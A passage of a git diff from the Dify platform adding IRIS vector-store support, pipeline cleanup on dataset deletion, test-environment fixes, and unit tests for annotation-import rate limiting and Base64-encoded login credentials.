import IndexProcessorFacto from core.tools.utils.web_reader_tool import get_image_upload_file_ids from extensions.ext_database import db from extensions.ext_storage import storage +from models import WorkflowType from models.dataset import ( AppDatasetJoin, Dataset, @@ -18,9 +19,11 @@ from models.dataset import ( DatasetQuery, Document, DocumentSegment, + Pipeline, SegmentAttachmentBinding, ) from models.model import UploadFile +from models.workflow import Workflow logger = logging.getLogger(__name__) @@ -34,6 +37,7 @@ def clean_dataset_task( index_struct: str, collection_binding_id: str, doc_form: str, + pipeline_id: str | None = None, ): """ Clean dataset when dataset deleted. @@ -135,6 +139,14 @@ def clean_dataset_task( # delete dataset metadata db.session.query(DatasetMetadata).where(DatasetMetadata.dataset_id == dataset_id).delete() db.session.query(DatasetMetadataBinding).where(DatasetMetadataBinding.dataset_id == dataset_id).delete() + # delete pipeline and workflow + if pipeline_id: + db.session.query(Pipeline).where(Pipeline.id == pipeline_id).delete() + db.session.query(Workflow).where( + Workflow.tenant_id == tenant_id, + Workflow.app_id == pipeline_id, + Workflow.type == WorkflowType.RAG_PIPELINE, + ).delete() # delete files if documents: for document in documents: diff --git a/api/tasks/delete_account_task.py b/api/tasks/delete_account_task.py index fb5eb1d691..cb703cc263 100644 --- a/api/tasks/delete_account_task.py +++ b/api/tasks/delete_account_task.py @@ -2,6 +2,7 @@ import logging from celery import shared_task +from configs import dify_config from extensions.ext_database import db from models import Account from services.billing_service import BillingService @@ -14,7 +15,8 @@ logger = logging.getLogger(__name__) def delete_account_task(account_id): account = db.session.query(Account).where(Account.id == account_id).first() try: - BillingService.delete_account(account_id) + if dify_config.BILLING_ENABLED: + BillingService.delete_account(account_id) except Exception: logger.exception("Failed to delete account %s from billing service.", account_id) raise diff --git a/api/tests/integration_tests/.env.example b/api/tests/integration_tests/.env.example index e508ceef66..acc268f1d4 100644 --- a/api/tests/integration_tests/.env.example +++ b/api/tests/integration_tests/.env.example @@ -55,7 +55,7 @@ WEB_API_CORS_ALLOW_ORIGINS=http://127.0.0.1:3000,* CONSOLE_CORS_ALLOW_ORIGINS=http://127.0.0.1:3000,* # Vector database configuration -# support: weaviate, qdrant, milvus, myscale, relyt, pgvecto_rs, pgvector, pgvector, chroma, opensearch, tidb_vector, couchbase, vikingdb, upstash, lindorm, oceanbase +# support: weaviate, qdrant, milvus, myscale, relyt, pgvecto_rs, pgvector, pgvector, chroma, opensearch, tidb_vector, couchbase, vikingdb, upstash, lindorm, oceanbase, iris VECTOR_STORE=weaviate # Weaviate configuration WEAVIATE_ENDPOINT=http://localhost:8080 @@ -64,6 +64,20 @@ WEAVIATE_GRPC_ENABLED=false WEAVIATE_BATCH_SIZE=100 WEAVIATE_TOKENIZATION=word +# InterSystems IRIS configuration +IRIS_HOST=localhost +IRIS_SUPER_SERVER_PORT=1972 +IRIS_WEB_SERVER_PORT=52773 +IRIS_USER=_SYSTEM +IRIS_PASSWORD=Dify@1234 +IRIS_DATABASE=USER +IRIS_SCHEMA=dify +IRIS_CONNECTION_URL= +IRIS_MIN_CONNECTION=1 +IRIS_MAX_CONNECTION=3 +IRIS_TEXT_INDEX=true +IRIS_TEXT_INDEX_LANGUAGE=en + # Upload configuration UPLOAD_FILE_SIZE_LIMIT=15 diff --git a/api/tests/integration_tests/conftest.py b/api/tests/integration_tests/conftest.py index 4395a9815a..948cf8b3a0 100644 --- a/api/tests/integration_tests/conftest.py +++ b/api/tests/integration_tests/conftest.py @@ -1,3 +1,4 @@ +import os import pathlib import random import secrets @@ -32,6 +33,10 @@ def _load_env(): _load_env() +# Override storage root to tmp to avoid polluting repo during local runs +os.environ["OPENDAL_FS_ROOT"] = "/tmp/dify-storage" +os.environ.setdefault("STORAGE_TYPE", "opendal") +os.environ.setdefault("OPENDAL_SCHEME", "fs") _CACHED_APP = create_app() diff --git a/api/tests/integration_tests/vdb/iris/__init__.py b/api/tests/integration_tests/vdb/iris/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/api/tests/integration_tests/vdb/iris/test_iris.py b/api/tests/integration_tests/vdb/iris/test_iris.py new file mode 100644 index 0000000000..49f6857743 --- /dev/null +++ b/api/tests/integration_tests/vdb/iris/test_iris.py @@ -0,0 +1,44 @@ +"""Integration tests for IRIS vector database.""" + +from core.rag.datasource.vdb.iris.iris_vector import IrisVector, IrisVectorConfig +from tests.integration_tests.vdb.test_vector_store import ( + AbstractVectorTest, + setup_mock_redis, +) + + +class IrisVectorTest(AbstractVectorTest): + """Test suite for IRIS vector store implementation.""" + + def __init__(self): + """Initialize IRIS vector test with hardcoded test configuration. + + Note: Uses 'host.docker.internal' to connect from DevContainer to + host OS Docker, or 'localhost' when running directly on host OS. + """ + super().__init__() + self.vector = IrisVector( + collection_name=self.collection_name, + config=IrisVectorConfig( + IRIS_HOST="host.docker.internal", + IRIS_SUPER_SERVER_PORT=1972, + IRIS_USER="_SYSTEM", + IRIS_PASSWORD="Dify@1234", + IRIS_DATABASE="USER", + IRIS_SCHEMA="dify", + IRIS_CONNECTION_URL=None, + IRIS_MIN_CONNECTION=1, + IRIS_MAX_CONNECTION=3, + IRIS_TEXT_INDEX=True, + IRIS_TEXT_INDEX_LANGUAGE="en", + ), + ) + + +def test_iris_vector(setup_mock_redis) -> None: + """Run all IRIS vector store tests. + + Args: + setup_mock_redis: Pytest fixture for mock Redis setup + """ + IrisVectorTest().run_all_tests() diff --git a/api/tests/test_containers_integration_tests/conftest.py b/api/tests/test_containers_integration_tests/conftest.py index 180ee1c963..d6d2d30305 100644 --- a/api/tests/test_containers_integration_tests/conftest.py +++ b/api/tests/test_containers_integration_tests/conftest.py @@ -138,9 +138,9 @@ class DifyTestContainers: logger.warning("Failed to create plugin database: %s", e) # Set up storage environment variables - os.environ["STORAGE_TYPE"] = "opendal" - os.environ["OPENDAL_SCHEME"] = "fs" - os.environ["OPENDAL_FS_ROOT"] = "storage" + os.environ.setdefault("STORAGE_TYPE", "opendal") + os.environ.setdefault("OPENDAL_SCHEME", "fs") + os.environ.setdefault("OPENDAL_FS_ROOT", "/tmp/dify-storage") # Start Redis container for caching and session management # Redis is used for storing session data, cache entries, and temporary data @@ -348,6 +348,13 @@ def _create_app_with_containers() -> Flask: """ logger.info("Creating Flask application with test container configuration...") + # Ensure Redis client reconnects to the containerized Redis (no auth) + from extensions import ext_redis + + ext_redis.redis_client._client = None + os.environ["REDIS_USERNAME"] = "" + os.environ["REDIS_PASSWORD"] = "" + # Re-create the config after environment variables have been set from configs import dify_config @@ -486,3 +493,29 @@ def db_session_with_containers(flask_app_with_containers) -> Generator[Session, finally: session.close() logger.debug("Database session closed") + + +@pytest.fixture(scope="package", autouse=True) +def mock_ssrf_proxy_requests(): + """ + Avoid outbound network during containerized tests by stubbing SSRF proxy helpers. + """ + + from unittest.mock import patch + + import httpx + + def _fake_request(method, url, **kwargs): + request = httpx.Request(method=method, url=url) + return httpx.Response(200, request=request, content=b"") + + with ( + patch("core.helper.ssrf_proxy.make_request", side_effect=_fake_request), + patch("core.helper.ssrf_proxy.get", side_effect=lambda url, **kw: _fake_request("GET", url, **kw)), + patch("core.helper.ssrf_proxy.post", side_effect=lambda url, **kw: _fake_request("POST", url, **kw)), + patch("core.helper.ssrf_proxy.put", side_effect=lambda url, **kw: _fake_request("PUT", url, **kw)), + patch("core.helper.ssrf_proxy.patch", side_effect=lambda url, **kw: _fake_request("PATCH", url, **kw)), + patch("core.helper.ssrf_proxy.delete", side_effect=lambda url, **kw: _fake_request("DELETE", url, **kw)), + patch("core.helper.ssrf_proxy.head", side_effect=lambda url, **kw: _fake_request("HEAD", url, **kw)), + ): + yield diff --git a/api/tests/test_containers_integration_tests/libs/broadcast_channel/redis/test_sharded_channel.py b/api/tests/test_containers_integration_tests/libs/broadcast_channel/redis/test_sharded_channel.py index ea61747ba2..d612e70910 100644 --- a/api/tests/test_containers_integration_tests/libs/broadcast_channel/redis/test_sharded_channel.py +++ b/api/tests/test_containers_integration_tests/libs/broadcast_channel/redis/test_sharded_channel.py @@ -113,16 +113,31 @@ class TestShardedRedisBroadcastChannelIntegration: topic = broadcast_channel.topic(topic_name) producer = topic.as_producer() subscriptions = [topic.subscribe() for _ in range(subscriber_count)] + ready_events = [threading.Event() for _ in range(subscriber_count)] def producer_thread(): - time.sleep(0.2) # Allow all subscribers to connect + deadline = time.time() + 5.0 + for ev in ready_events: + remaining = deadline - time.time() + if remaining <= 0: + break + if not ev.wait(timeout=max(0.0, remaining)): + pytest.fail("subscriber did not become ready before publish deadline") producer.publish(message) time.sleep(0.2) for sub in subscriptions: sub.close() - def consumer_thread(subscription: Subscription) -> list[bytes]: + def consumer_thread(subscription: Subscription, ready_event: threading.Event) -> list[bytes]: received_msgs = [] + # Prime subscription so the underlying Pub/Sub listener thread starts before publishing + try: + _ = subscription.receive(0.01) + except SubscriptionClosedError: + return received_msgs + finally: + ready_event.set() + while True: try: msg = subscription.receive(0.1) @@ -137,7 +152,10 @@ class TestShardedRedisBroadcastChannelIntegration: with ThreadPoolExecutor(max_workers=subscriber_count + 1) as executor: producer_future = executor.submit(producer_thread) - consumer_futures = [executor.submit(consumer_thread, subscription) for subscription in subscriptions] + consumer_futures = [ + executor.submit(consumer_thread, subscription, ready_events[idx]) + for idx, subscription in enumerate(subscriptions) + ] producer_future.result(timeout=10.0) msgs_by_consumers = [] @@ -240,8 +258,7 @@ class TestShardedRedisBroadcastChannelIntegration: for future in as_completed(producer_futures, timeout=30.0): sent_msgs.update(future.result()) - subscription.close() - consumer_received_msgs = consumer_future.result(timeout=30.0) + consumer_received_msgs = consumer_future.result(timeout=60.0) assert sent_msgs == consumer_received_msgs diff --git a/api/tests/test_containers_integration_tests/services/test_webhook_service.py b/api/tests/test_containers_integration_tests/services/test_webhook_service.py index 8328db950c..e3431fd382 100644 --- a/api/tests/test_containers_integration_tests/services/test_webhook_service.py +++ b/api/tests/test_containers_integration_tests/services/test_webhook_service.py @@ -233,7 +233,7 @@ class TestWebhookService: "/webhook", method="POST", headers={"Content-Type": "multipart/form-data"}, - data={"message": "test", "upload": file_storage}, + data={"message": "test", "file": file_storage}, ): webhook_trigger = MagicMock() webhook_trigger.tenant_id = "test_tenant" @@ -242,7 +242,7 @@ class TestWebhookService: assert webhook_data["method"] == "POST" assert webhook_data["body"]["message"] == "test" - assert "upload" in webhook_data["files"] + assert "file" in webhook_data["files"] # Verify file processing was called mock_external_dependencies["tool_file_manager"].assert_called_once() @@ -414,7 +414,7 @@ class TestWebhookService: "data": { "method": "post", "content_type": "multipart/form-data", - "body": [{"name": "upload", "type": "file", "required": True}], + "body": [{"name": "file", "type": "file", "required": True}], } } diff --git a/api/tests/unit_tests/conftest.py b/api/tests/unit_tests/conftest.py index f484fb22d3..c5e1576186 100644 --- a/api/tests/unit_tests/conftest.py +++ b/api/tests/unit_tests/conftest.py @@ -26,16 +26,29 @@ redis_mock.hgetall = MagicMock(return_value={}) redis_mock.hdel = MagicMock() redis_mock.incr = MagicMock(return_value=1) +# Ensure OpenDAL fs writes to tmp to avoid polluting workspace +os.environ.setdefault("OPENDAL_SCHEME", "fs") +os.environ.setdefault("OPENDAL_FS_ROOT", "/tmp/dify-storage") +os.environ.setdefault("STORAGE_TYPE", "opendal") + # Add the API directory to Python path to ensure proper imports import sys sys.path.insert(0, PROJECT_DIR) -# apply the mock to the Redis client in the Flask app from extensions import ext_redis -redis_patcher = patch.object(ext_redis, "redis_client", redis_mock) -redis_patcher.start() + +def _patch_redis_clients_on_loaded_modules(): + """Ensure any module-level redis_client references point to the shared redis_mock.""" + + import sys + + for module in list(sys.modules.values()): + if module is None: + continue + if hasattr(module, "redis_client"): + module.redis_client = redis_mock @pytest.fixture @@ -49,6 +62,15 @@ def _provide_app_context(app: Flask): yield +@pytest.fixture(autouse=True) +def _patch_redis_clients(): + """Patch redis_client to MagicMock only for unit test executions.""" + + with patch.object(ext_redis, "redis_client", redis_mock): + _patch_redis_clients_on_loaded_modules() + yield + + @pytest.fixture(autouse=True) def reset_redis_mock(): """reset the Redis mock before each test""" @@ -63,3 +85,20 @@ def reset_redis_mock(): redis_mock.hgetall.return_value = {} redis_mock.hdel.return_value = None redis_mock.incr.return_value = 1 + + # Keep any imported modules pointing at the mock between tests + _patch_redis_clients_on_loaded_modules() + + +@pytest.fixture(autouse=True) +def reset_secret_key(): + """Ensure SECRET_KEY-dependent logic sees an empty config value by default.""" + + from configs import dify_config + + original = dify_config.SECRET_KEY + dify_config.SECRET_KEY = "" + try: + yield + finally: + dify_config.SECRET_KEY = original diff --git a/api/tests/unit_tests/controllers/console/app/test_annotation_security.py b/api/tests/unit_tests/controllers/console/app/test_annotation_security.py new file mode 100644 index 0000000000..06a7b98baf --- /dev/null +++ b/api/tests/unit_tests/controllers/console/app/test_annotation_security.py @@ -0,0 +1,347 @@ +""" +Unit tests for annotation import security features. + +Tests rate limiting, concurrency control, file validation, and other +security features added to prevent DoS attacks on the annotation import endpoint. +""" + +import io +from unittest.mock import MagicMock, patch + +import pytest +from pandas.errors import ParserError +from werkzeug.datastructures import FileStorage + +from configs import dify_config + + +class TestAnnotationImportRateLimiting: + """Test rate limiting for annotation import operations.""" + + @pytest.fixture + def mock_redis(self): + """Mock Redis client for testing.""" + with patch("controllers.console.wraps.redis_client") as mock: + yield mock + + @pytest.fixture + def mock_current_account(self): + """Mock current account with tenant.""" + with patch("controllers.console.wraps.current_account_with_tenant") as mock: + mock.return_value = (MagicMock(id="user_id"), "test_tenant_id") + yield mock + + def test_rate_limit_per_minute_enforced(self, mock_redis, mock_current_account): + """Test that per-minute rate limit is enforced.""" + from controllers.console.wraps import annotation_import_rate_limit + + # Simulate exceeding per-minute limit + mock_redis.zcard.side_effect = [ + dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE + 1, # Minute check + 10, # Hour check + ] + + @annotation_import_rate_limit + def dummy_view(): + return "success" + + # Should abort with 429 + with pytest.raises(Exception) as exc_info: + dummy_view() + + # Verify it's a rate limit error + assert "429" in str(exc_info.value) or "Too many" in str(exc_info.value) + + def test_rate_limit_per_hour_enforced(self, mock_redis, mock_current_account): + """Test that per-hour rate limit is enforced.""" + from controllers.console.wraps import annotation_import_rate_limit + + # Simulate exceeding per-hour limit + mock_redis.zcard.side_effect = [ + 3, # Minute check (under limit) + dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR + 1, # Hour check (over limit) + ] + + @annotation_import_rate_limit + def dummy_view(): + return "success" + + # Should abort with 429 + with pytest.raises(Exception) as exc_info: + dummy_view() + + assert "429" in str(exc_info.value) or "Too many" in str(exc_info.value) + + def test_rate_limit_within_limits_passes(self, mock_redis, mock_current_account): + """Test that requests within limits are allowed.""" + from controllers.console.wraps import annotation_import_rate_limit + + # Simulate being under both limits + mock_redis.zcard.return_value = 2 + + @annotation_import_rate_limit + def dummy_view(): + return "success" + + # Should succeed + result = dummy_view() + assert result == "success" + + # Verify Redis operations were called + assert mock_redis.zadd.called + assert mock_redis.zremrangebyscore.called + + +class TestAnnotationImportConcurrencyControl: + """Test concurrency control for annotation import operations.""" + + @pytest.fixture + def mock_redis(self): + """Mock Redis client for testing.""" + with patch("controllers.console.wraps.redis_client") as mock: + yield mock + + @pytest.fixture + def mock_current_account(self): + """Mock current account with tenant.""" + with patch("controllers.console.wraps.current_account_with_tenant") as mock: + mock.return_value = (MagicMock(id="user_id"), "test_tenant_id") + yield mock + + def test_concurrency_limit_enforced(self, mock_redis, mock_current_account): + """Test that concurrent task limit is enforced.""" + from controllers.console.wraps import annotation_import_concurrency_limit + + # Simulate max concurrent tasks already running + mock_redis.zcard.return_value = dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT + + @annotation_import_concurrency_limit + def dummy_view(): + return "success" + + # Should abort with 429 + with pytest.raises(Exception) as exc_info: + dummy_view() + + assert "429" in str(exc_info.value) or "concurrent" in str(exc_info.value).lower() + + def test_concurrency_within_limit_passes(self, mock_redis, mock_current_account): + """Test that requests within concurrency limits are allowed.""" + from controllers.console.wraps import annotation_import_concurrency_limit + + # Simulate being under concurrent task limit + mock_redis.zcard.return_value = 1 + + @annotation_import_concurrency_limit + def dummy_view(): + return "success" + + # Should succeed + result = dummy_view() + assert result == "success" + + def test_stale_jobs_are_cleaned_up(self, mock_redis, mock_current_account): + """Test that old/stale job entries are removed.""" + from controllers.console.wraps import annotation_import_concurrency_limit + + mock_redis.zcard.return_value = 0 + + @annotation_import_concurrency_limit + def dummy_view(): + return "success" + + dummy_view() + + # Verify cleanup was called + assert mock_redis.zremrangebyscore.called + + +class TestAnnotationImportFileValidation: + """Test file validation in annotation import.""" + + def test_file_size_limit_enforced(self): + """Test that files exceeding size limit are rejected.""" + # Create a file larger than the limit + max_size = dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT * 1024 * 1024 + large_content = b"x" * (max_size + 1024) # Exceed by 1KB + + file = FileStorage(stream=io.BytesIO(large_content), filename="test.csv", content_type="text/csv") + + # Should be rejected in controller + # This would be tested in integration tests with actual endpoint + + def test_empty_file_rejected(self): + """Test that empty files are rejected.""" + file = FileStorage(stream=io.BytesIO(b""), filename="test.csv", content_type="text/csv") + + # Should be rejected + # This would be tested in integration tests + + def test_non_csv_file_rejected(self): + """Test that non-CSV files are rejected.""" + file = FileStorage(stream=io.BytesIO(b"test"), filename="test.txt", content_type="text/plain") + + # Should be rejected based on extension + # This would be tested in integration tests + + +class TestAnnotationImportServiceValidation: + """Test service layer validation for annotation import.""" + + @pytest.fixture + def mock_app(self): + """Mock application object.""" + app = MagicMock() + app.id = "app_id" + return app + + @pytest.fixture + def mock_db_session(self): + """Mock database session.""" + with patch("services.annotation_service.db.session") as mock: + yield mock + + def test_max_records_limit_enforced(self, mock_app, mock_db_session): + """Test that files with too many records are rejected.""" + from services.annotation_service import AppAnnotationService + + # Create CSV with too many records + max_records = dify_config.ANNOTATION_IMPORT_MAX_RECORDS + csv_content = "question,answer\n" + for i in range(max_records + 100): + csv_content += f"Question {i},Answer {i}\n" + + file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv") + + mock_db_session.query.return_value.where.return_value.first.return_value = mock_app + + with patch("services.annotation_service.current_account_with_tenant") as mock_auth: + mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id") + + with patch("services.annotation_service.FeatureService") as mock_features: + mock_features.get_features.return_value.billing.enabled = False + + result = AppAnnotationService.batch_import_app_annotations("app_id", file) + + # Should return error about too many records + assert "error_msg" in result + assert "too many" in result["error_msg"].lower() or "maximum" in result["error_msg"].lower() + + def test_min_records_limit_enforced(self, mock_app, mock_db_session): + """Test that files with too few valid records are rejected.""" + from services.annotation_service import AppAnnotationService + + # Create CSV with only header (no data rows) + csv_content = "question,answer\n" + + file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv") + + mock_db_session.query.return_value.where.return_value.first.return_value = mock_app + + with patch("services.annotation_service.current_account_with_tenant") as mock_auth: + mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id") + + result = AppAnnotationService.batch_import_app_annotations("app_id", file) + + # Should return error about insufficient records + assert "error_msg" in result + assert "at least" in result["error_msg"].lower() or "minimum" in result["error_msg"].lower() + + def test_invalid_csv_format_handled(self, mock_app, mock_db_session): + """Test that invalid CSV format is handled gracefully.""" + from services.annotation_service import AppAnnotationService + + # Any content is fine once we force ParserError + csv_content = 'invalid,csv,format\nwith,unbalanced,quotes,and"stuff' + file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv") + + mock_db_session.query.return_value.where.return_value.first.return_value = mock_app + + with ( + patch("services.annotation_service.current_account_with_tenant") as mock_auth, + patch("services.annotation_service.pd.read_csv", side_effect=ParserError("malformed CSV")), + ): + mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id") + + result = AppAnnotationService.batch_import_app_annotations("app_id", file) + + assert "error_msg" in result + assert "malformed" in result["error_msg"].lower() + + def test_valid_import_succeeds(self, mock_app, mock_db_session): + """Test that valid import request succeeds.""" + from services.annotation_service import AppAnnotationService + + # Create valid CSV + csv_content = "question,answer\nWhat is AI?,Artificial Intelligence\nWhat is ML?,Machine Learning\n" + + file = FileStorage(stream=io.BytesIO(csv_content.encode()), filename="test.csv", content_type="text/csv") + + mock_db_session.query.return_value.where.return_value.first.return_value = mock_app + + with patch("services.annotation_service.current_account_with_tenant") as mock_auth: + mock_auth.return_value = (MagicMock(id="user_id"), "tenant_id") + + with patch("services.annotation_service.FeatureService") as mock_features: + mock_features.get_features.return_value.billing.enabled = False + + with patch("services.annotation_service.batch_import_annotations_task") as mock_task: + with patch("services.annotation_service.redis_client"): + result = AppAnnotationService.batch_import_app_annotations("app_id", file) + + # Should return success response + assert "job_id" in result + assert "job_status" in result + assert result["job_status"] == "waiting" + assert "record_count" in result + assert result["record_count"] == 2 + + +class TestAnnotationImportTaskOptimization: + """Test optimizations in batch import task.""" + + def test_task_has_timeout_configured(self): + """Test that task has proper timeout configuration.""" + from tasks.annotation.batch_import_annotations_task import batch_import_annotations_task + + # Verify task configuration + assert hasattr(batch_import_annotations_task, "time_limit") + assert hasattr(batch_import_annotations_task, "soft_time_limit") + + # Check timeout values are reasonable + # Hard limit should be 6 minutes (360s) + # Soft limit should be 5 minutes (300s) + # Note: actual values depend on Celery configuration + + +class TestConfigurationValues: + """Test that security configuration values are properly set.""" + + def test_rate_limit_configs_exist(self): + """Test that rate limit configurations are defined.""" + assert hasattr(dify_config, "ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE") + assert hasattr(dify_config, "ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR") + + assert dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_MINUTE > 0 + assert dify_config.ANNOTATION_IMPORT_RATE_LIMIT_PER_HOUR > 0 + + def test_file_size_limit_config_exists(self): + """Test that file size limit configuration is defined.""" + assert hasattr(dify_config, "ANNOTATION_IMPORT_FILE_SIZE_LIMIT") + assert dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT > 0 + assert dify_config.ANNOTATION_IMPORT_FILE_SIZE_LIMIT <= 10 # Reasonable max (10MB) + + def test_record_limit_configs_exist(self): + """Test that record limit configurations are defined.""" + assert hasattr(dify_config, "ANNOTATION_IMPORT_MAX_RECORDS") + assert hasattr(dify_config, "ANNOTATION_IMPORT_MIN_RECORDS") + + assert dify_config.ANNOTATION_IMPORT_MAX_RECORDS > 0 + assert dify_config.ANNOTATION_IMPORT_MIN_RECORDS > 0 + assert dify_config.ANNOTATION_IMPORT_MIN_RECORDS < dify_config.ANNOTATION_IMPORT_MAX_RECORDS + + def test_concurrency_limit_config_exists(self): + """Test that concurrency limit configuration is defined.""" + assert hasattr(dify_config, "ANNOTATION_IMPORT_MAX_CONCURRENT") + assert dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT > 0 + assert dify_config.ANNOTATION_IMPORT_MAX_CONCURRENT <= 10 # Reasonable upper bound diff --git a/api/tests/unit_tests/controllers/console/auth/test_authentication_security.py b/api/tests/unit_tests/controllers/console/auth/test_authentication_security.py index b6697ac5d4..eb21920117 100644 --- a/api/tests/unit_tests/controllers/console/auth/test_authentication_security.py +++ b/api/tests/unit_tests/controllers/console/auth/test_authentication_security.py @@ -1,5 +1,6 @@ """Test authentication security to prevent user enumeration.""" +import base64 from unittest.mock import MagicMock, patch import pytest @@ -11,6 +12,11 @@ from controllers.console.auth.error import AuthenticationFailedError from controllers.console.auth.login import LoginApi +def encode_password(password: str) -> str: + """Helper to encode password as Base64 for testing.""" + return base64.b64encode(password.encode("utf-8")).decode() + + class TestAuthenticationSecurity: """Test authentication endpoints for security against user enumeration.""" @@ -42,7 +48,9 @@ class TestAuthenticationSecurity: # Act with self.app.test_request_context( - "/login", method="POST", json={"email": "nonexistent@example.com", "password": "WrongPass123!"} + "/login", + method="POST", + json={"email": "nonexistent@example.com", "password": encode_password("WrongPass123!")}, ): login_api = LoginApi() @@ -72,7 +80,9 @@ class TestAuthenticationSecurity: # Act with self.app.test_request_context( - "/login", method="POST", json={"email": "existing@example.com", "password": "WrongPass123!"} + "/login", + method="POST", + json={"email": "existing@example.com", "password": encode_password("WrongPass123!")}, ): login_api = LoginApi() @@ -104,7 +114,9 @@ class TestAuthenticationSecurity: # Act with self.app.test_request_context( - "/login", method="POST", json={"email": "nonexistent@example.com", "password": "WrongPass123!"} + "/login", + method="POST", + json={"email": "nonexistent@example.com", "password": encode_password("WrongPass123!")}, ): login_api = LoginApi() diff --git a/api/tests/unit_tests/controllers/console/auth/test_email_verification.py b/api/tests/unit_tests/controllers/console/auth/test_email_verification.py index a44f518171..9929a71120 100644 --- a/api/tests/unit_tests/controllers/console/auth/test_email_verification.py +++ b/api/tests/unit_tests/controllers/console/auth/test_email_verification.py @@ -8,6 +8,7 @@ This module tests the email code login mechanism including: - Workspace creation for new users """ +import base64 from unittest.mock import MagicMock, patch import pytest @@ -25,6 +26,11 @@ from controllers.console.error import ( from services.errors.account import AccountRegisterError +def encode_code(code: str) -> str: + """Helper to encode verification code as Base64 for testing.""" + return base64.b64encode(code.encode("utf-8")).decode() + + class TestEmailCodeLoginSendEmailApi: """Test cases for sending email verification codes.""" @@ -290,7 +296,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "test@example.com", "code": "123456", "token": "valid_token"}, + json={"email": "test@example.com", "code": encode_code("123456"), "token": "valid_token"}, ): api = EmailCodeLoginApi() response = api.post() @@ -339,7 +345,12 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "newuser@example.com", "code": "123456", "token": "valid_token", "language": "en-US"}, + json={ + "email": "newuser@example.com", + "code": encode_code("123456"), + "token": "valid_token", + "language": "en-US", + }, ): api = EmailCodeLoginApi() response = api.post() @@ -365,7 +376,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "test@example.com", "code": "123456", "token": "invalid_token"}, + json={"email": "test@example.com", "code": encode_code("123456"), "token": "invalid_token"}, ): api = EmailCodeLoginApi() with pytest.raises(InvalidTokenError): @@ -388,7 +399,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "different@example.com", "code": "123456", "token": "token"}, + json={"email": "different@example.com", "code": encode_code("123456"), "token": "token"}, ): api = EmailCodeLoginApi() with pytest.raises(InvalidEmailError): @@ -411,7 +422,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "test@example.com", "code": "wrong_code", "token": "token"}, + json={"email": "test@example.com", "code": encode_code("wrong_code"), "token": "token"}, ): api = EmailCodeLoginApi() with pytest.raises(EmailCodeError): @@ -497,7 +508,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "test@example.com", "code": "123456", "token": "token"}, + json={"email": "test@example.com", "code": encode_code("123456"), "token": "token"}, ): api = EmailCodeLoginApi() with pytest.raises(WorkspacesLimitExceeded): @@ -539,7 +550,7 @@ class TestEmailCodeLoginApi: with app.test_request_context( "/email-code-login/validity", method="POST", - json={"email": "test@example.com", "code": "123456", "token": "token"}, + json={"email": "test@example.com", "code": encode_code("123456"), "token": "token"}, ): api = EmailCodeLoginApi() with pytest.raises(NotAllowedCreateWorkspace): diff --git a/api/tests/unit_tests/controllers/console/auth/test_login_logout.py b/api/tests/unit_tests/controllers/console/auth/test_login_logout.py index 8799d6484d..3a2cf7bad7 100644 --- a/api/tests/unit_tests/controllers/console/auth/test_login_logout.py +++ b/api/tests/unit_tests/controllers/console/auth/test_login_logout.py @@ -8,6 +8,7 @@ This module tests the core authentication endpoints including: - Account status validation """ +import base64 from unittest.mock import MagicMock, patch import pytest @@ -28,6 +29,11 @@ from controllers.console.error import ( from services.errors.account import AccountLoginError, AccountPasswordError +def encode_password(password: str) -> str: + """Helper to encode password as Base64 for testing.""" + return base64.b64encode(password.encode("utf-8")).decode() + + class TestLoginApi: """Test cases for the LoginApi endpoint.""" @@ -106,7 +112,9 @@ class TestLoginApi: # Act with app.test_request_context( - "/login", method="POST", json={"email": "test@example.com", "password": "ValidPass123!"} + "/login", + method="POST", + json={"email": "test@example.com", "password": encode_password("ValidPass123!")}, ): login_api = LoginApi() response = login_api.post() @@ -158,7 +166,11 @@ class TestLoginApi: with app.test_request_context( "/login", method="POST", - json={"email": "test@example.com", "password": "ValidPass123!", "invite_token": "valid_token"}, + json={ + "email": "test@example.com", + "password": encode_password("ValidPass123!"), + "invite_token": "valid_token", + }, ): login_api = LoginApi() response = login_api.post() @@ -186,7 +198,7 @@ class TestLoginApi: # Act & Assert with app.test_request_context( - "/login", method="POST", json={"email": "test@example.com", "password": "password"} + "/login", method="POST", json={"email": "test@example.com", "password": encode_password("password")} ): login_api = LoginApi() with pytest.raises(EmailPasswordLoginLimitError): @@ -209,7 +221,7 @@ class TestLoginApi: # Act & Assert with app.test_request_context( - "/login", method="POST", json={"email": "frozen@example.com", "password": "password"} + "/login", method="POST", json={"email": "frozen@example.com", "password": encode_password("password")} ): login_api = LoginApi() with pytest.raises(AccountInFreezeError): @@ -246,7 +258,7 @@ class TestLoginApi: # Act & Assert with app.test_request_context( - "/login", method="POST", json={"email": "test@example.com", "password": "WrongPass123!"} + "/login", method="POST", json={"email": "test@example.com", "password": encode_password("WrongPass123!")} ): login_api = LoginApi() with pytest.raises(AuthenticationFailedError): @@ -277,7 +289,7 @@ class TestLoginApi: # Act & Assert with app.test_request_context( - "/login", method="POST", json={"email": "banned@example.com", "password": "ValidPass123!"} + "/login", method="POST", json={"email": "banned@example.com", "password": encode_password("ValidPass123!")} ): login_api = LoginApi() with pytest.raises(AccountBannedError): @@ -322,7 